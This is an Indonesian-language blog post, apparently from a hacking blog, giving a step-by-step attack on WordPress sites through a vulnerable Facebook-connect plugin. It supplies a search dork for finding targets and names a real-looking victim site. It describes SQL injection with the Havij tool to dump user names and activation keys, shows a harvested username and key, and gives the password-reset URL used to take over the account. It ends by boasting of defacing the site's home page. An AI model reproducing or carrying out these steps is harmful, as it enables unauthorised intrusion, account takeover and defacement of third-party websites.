Hack Wordpress ( SQL Injection+Reset Password )

Kali ini saya menulis tentang keamanan di plugin WP,sebenarnya cukup banyak plugin
wp yang rentan,tapi saya hanya membahas salah satunya saja.Ok tanpa banyak cingcong
langsung aja deh...
peralatan yang dibutuhkan adalah:
1. Kompie terhubung internet
2. Havij
3. dork: inurl:fbconnect_action=myhome ( kreasi lagi yaa )
4. Kesabaran dalam mencari target
5. Rokok,Kopi dan musik yang kuenceng ( disarankan alirannya Rock,Metal )
hehehe
saya beri contoh satu korban yaitu
http://www.40sale.com/?fbconnect_action=myhome&userid=14 pada bagian "userid=" di
tambahin tulisan " fb" jadi bentuknya seperti ini
http://www.40sale.com/?fbconnect_action=myhome&fbuserid=14

 kalau udah scan dengan Havij dan cari tabel wp_user atau yang berhubungan dengan user
lah,kalau udah ketemu cari column user_login dan user_activation_key

 heheh...dah ketemu tuh yang kita cari,
username:pico
Activation key: GBasuGIZFtbUjpP3MvWb
sekarang kita gunakan exploitnya yaitu
wp-login.php?action=rp&key="kode aktivasi"&login="user login"
jadi alamatnya tadi dirubah seperti ini http://www.40sale.com/wplogin.
php?action=rp&key=GBasuGIZFtbUjpP3MvWb&login=pico

 sampailah kita ke tahap me-reset password korban heheh,kalau udah direset kita tinggal
login dan melakukan sekehendak kita

 saya cukup ngedit home.php nya aja dah,hehehe

 buseeeet hasilnya kelam banget dah...sory ya min

• Tweet
• Share
• Share
• Share
• Share

Sign up here with your email